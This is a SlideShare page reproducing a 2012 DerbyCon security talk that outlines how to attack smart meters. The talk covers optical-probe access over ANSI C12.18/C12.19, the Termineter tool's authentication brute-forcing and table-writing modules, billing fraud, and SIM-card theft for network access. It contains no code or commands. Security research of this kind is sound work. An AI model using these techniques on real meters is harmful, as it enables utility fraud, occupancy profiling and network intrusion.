ºÝºÝߣ

ºÝºÝߣShare a Scribd company logo

How I Learned To Stop Worrying And Love the Smart Meter

?Download as PPTX, PDF?
?
Z
zeroSteiner

The document discusses attacking smart meters. It provides background on smart meter infrastructure and explains why attackers may target smart meters for information or access. It then demonstrates how to access smart meters wired through an optical probe using the open source Termineter framework, which implements protocols like C12.18 and C12.19 to read and write meter data tables. A demo of the Termineter tool is shown, and future work like Zigbee integration is discussed.

1 of 23
Downloaded 10 times
How I Learned To Stop Worrying and Love the Smart Meter September 30th, 2012 DerbyCon 2.0 Spencer McIntyre
About Your Presenter 2 ? Spencer McIntyre ? Security Consultant on SecureState's Research and Innovation team ? Background/Specialization ? Tool development ? ¡°Special Projects¡±
? Agenda: ? Meter Back Ground ? Attacking Meters 3
Background ? What is AMI ? AMI (Advanced Metering Infrastructure) ? The infrastructure to communicate with gas, water and electric meters ? Allows two way communication with the meter ¡ð Compared to AMR which only allows for one way communication ? Component in a smart grid ? Allows automatic, remote readings and configuration ? Today, we¡¯re focusing on the meter component 4
Background ? The old days of stealing with magnets are ending ? USA Today estimate $6 billion in power stolen each year ? AMI is still being deployed in many locations 5
Why Attack Smart Meters? ? Same two reasons we typically attack anything ? Information ¡ð Control of information ? Access ? Consumers have physical access ? Smart Meters are growing in popularity 6
? Meters store usage information ? Information can be modified to affect billing ? Modification results in fraud ? Usage can be profiled ? Electric meters would be best bet ? Peak usage can identify when occupants are home or building is in use 7 Information
? Some meters can access the service provider¡¯s internal network via Cellular connection ? Not the case when a central unit is used to collect data ? Meter has a SIM card ? Requires typical SIM card settings (APN, username, password, etc.) ? Either direct internet access or private network access 8 Access
? Attacker with physical access can open the meter and retrieve the SIM card ? Guess/Bruteforce Settings ? APN ? Username (if set) ? Password (if set) ? Internal network access 9 Case Study
Accessing Meters ? At a basic level, there are two mechanisms ? Wireless ¡ð Zigbee ¡ð Cellular ? Wired (We¡¯re only covering this one) ¡ð Optical Interface 10
Wired Access ? Meters can be accessed using a physical connection ? ANSI Type-2 Optical Probe (sounds dirty) ? Couple of standards in use here ? C12.18 ¡ð Defines standards for accessing data (requests/responses) ? C12.19 ¡ð Defines standards for data formats 11
C12.19 Background ? Tables are broken up into ¡°decades¡± based on IDs ? General Configuration 0-9 ? Security Tables 40-49 ¡ð Defines access permissions ? History and Event Logs 70-79 ? Telephone/Modem Control 90-99 ? About 10 more defined by C12.19-2008 Standard 12
Physical Equipment ? Optical Probes are expensive (~$500) ? Can be created for cheaper? ? Use infrared transceivers 13
Introduction: Termineter ? The ¡°Termineter¡± Framework provides access to meters over C12.18 ? Modeled after the Metasploit Framework for ease of use ? Implemented in Python ? Includes full C12.18 stack and C12.19 library ? Released last week ? Open Source http://code.google.com/p/termineter 14
Termineter: Features ? Currently interacts with meters via a serial connection ? Core features implemented as modules ? 12 modules in total ? Modules mostly focus on reading/writing to C12.19 tables ? Everything involves reading/writing to tables ? Even running ¡°Procedures¡± 15
Termineter: Modules ? Included Modules: ? Basic information retrieval ? Brute forcing authentication ? Reading/Writing to tables (low-level) 16
Termineter: Modules ? Modules require some knowledge (not quite script-kiddie ready) ? Mostly of valid data to write to tables ? Procedures can be tricky, check the documentation ? Some modules can automate common tasks ? Changing the Meter¡¯s ID ? Setting the Meter¡¯s operating mode 17
Terminating with Termineter ? Common security issues ? Some table values can be modified without proper authentication (via invalid password) ? Some meters ignore username and user ID field with authenticating users ? No lock out, just logging of failed attempts 18
Termineter Demo ? Let the demos begin! 19
Termineter Future ? Getting this far has been a fight ? Future plans include ? Zigbee integration ? Support for character sets beyond 7-bit ? Additional modules ¡ð Easier access to procedures 20
21
References ? ANSI C12.18 Standard ? ANSI C12.19 Standard 22
Thank you for your time! Spencer McIntyre Email: SMcIntyre@SecureState.net Twitter: @zeroSteiner Termineter Homepage: http://code.google.com/p/termineter 23 Q U E S T I O N S A N S W E R S

More Related Content

How I Learned To Stop Worrying And Love the Smart Meter

  • 1. How I Learned To Stop Worrying and Love the Smart Meter September 30th, 2012 DerbyCon 2.0 Spencer McIntyre
  • 2. About Your Presenter 2 ? Spencer McIntyre ? Security Consultant on SecureState's Research and Innovation team ? Background/Specialization ? Tool development ? ¡°Special Projects¡±
  • 3. ? Agenda: ? Meter Back Ground ? Attacking Meters 3
  • 4. Background ? What is AMI ? AMI (Advanced Metering Infrastructure) ? The infrastructure to communicate with gas, water and electric meters ? Allows two way communication with the meter ¡ð Compared to AMR which only allows for one way communication ? Component in a smart grid ? Allows automatic, remote readings and configuration ? Today, we¡¯re focusing on the meter component 4
  • 5. Background ? The old days of stealing with magnets are ending ? USA Today estimate $6 billion in power stolen each year ? AMI is still being deployed in many locations 5
  • 6. Why Attack Smart Meters? ? Same two reasons we typically attack anything ? Information ¡ð Control of information ? Access ? Consumers have physical access ? Smart Meters are growing in popularity 6
  • 7. ? Meters store usage information ? Information can be modified to affect billing ? Modification results in fraud ? Usage can be profiled ? Electric meters would be best bet ? Peak usage can identify when occupants are home or building is in use 7 Information
  • 8. ? Some meters can access the service provider¡¯s internal network via Cellular connection ? Not the case when a central unit is used to collect data ? Meter has a SIM card ? Requires typical SIM card settings (APN, username, password, etc.) ? Either direct internet access or private network access 8 Access
  • 9. ? Attacker with physical access can open the meter and retrieve the SIM card ? Guess/Bruteforce Settings ? APN ? Username (if set) ? Password (if set) ? Internal network access 9 Case Study
  • 10. Accessing Meters ? At a basic level, there are two mechanisms ? Wireless ¡ð Zigbee ¡ð Cellular ? Wired (We¡¯re only covering this one) ¡ð Optical Interface 10
  • 11. Wired Access ? Meters can be accessed using a physical connection ? ANSI Type-2 Optical Probe (sounds dirty) ? Couple of standards in use here ? C12.18 ¡ð Defines standards for accessing data (requests/responses) ? C12.19 ¡ð Defines standards for data formats 11
  • 12. C12.19 Background ? Tables are broken up into ¡°decades¡± based on IDs ? General Configuration 0-9 ? Security Tables 40-49 ¡ð Defines access permissions ? History and Event Logs 70-79 ? Telephone/Modem Control 90-99 ? About 10 more defined by C12.19-2008 Standard 12
  • 13. Physical Equipment ? Optical Probes are expensive (~$500) ? Can be created for cheaper? ? Use infrared transceivers 13
  • 14. Introduction: Termineter ? The ¡°Termineter¡± Framework provides access to meters over C12.18 ? Modeled after the Metasploit Framework for ease of use ? Implemented in Python ? Includes full C12.18 stack and C12.19 library ? Released last week ? Open Source http://code.google.com/p/termineter 14
  • 15. Termineter: Features ? Currently interacts with meters via a serial connection ? Core features implemented as modules ? 12 modules in total ? Modules mostly focus on reading/writing to C12.19 tables ? Everything involves reading/writing to tables ? Even running ¡°Procedures¡± 15
  • 16. Termineter: Modules ? Included Modules: ? Basic information retrieval ? Brute forcing authentication ? Reading/Writing to tables (low-level) 16
  • 17. Termineter: Modules ? Modules require some knowledge (not quite script-kiddie ready) ? Mostly of valid data to write to tables ? Procedures can be tricky, check the documentation ? Some modules can automate common tasks ? Changing the Meter¡¯s ID ? Setting the Meter¡¯s operating mode 17
  • 18. Terminating with Termineter ? Common security issues ? Some table values can be modified without proper authentication (via invalid password) ? Some meters ignore username and user ID field with authenticating users ? No lock out, just logging of failed attempts 18
  • 19. Termineter Demo ? Let the demos begin! 19
  • 20. Termineter Future ? Getting this far has been a fight ? Future plans include ? Zigbee integration ? Support for character sets beyond 7-bit ? Additional modules ¡ð Easier access to procedures 20
  • 21. 21
  • 22. References ? ANSI C12.18 Standard ? ANSI C12.19 Standard 22
  • 23. Thank you for your time! Spencer McIntyre Email: SMcIntyre@SecureState.net Twitter: @zeroSteiner Termineter Homepage: http://code.google.com/p/termineter 23 Q U E S T I O N S A N S W E R S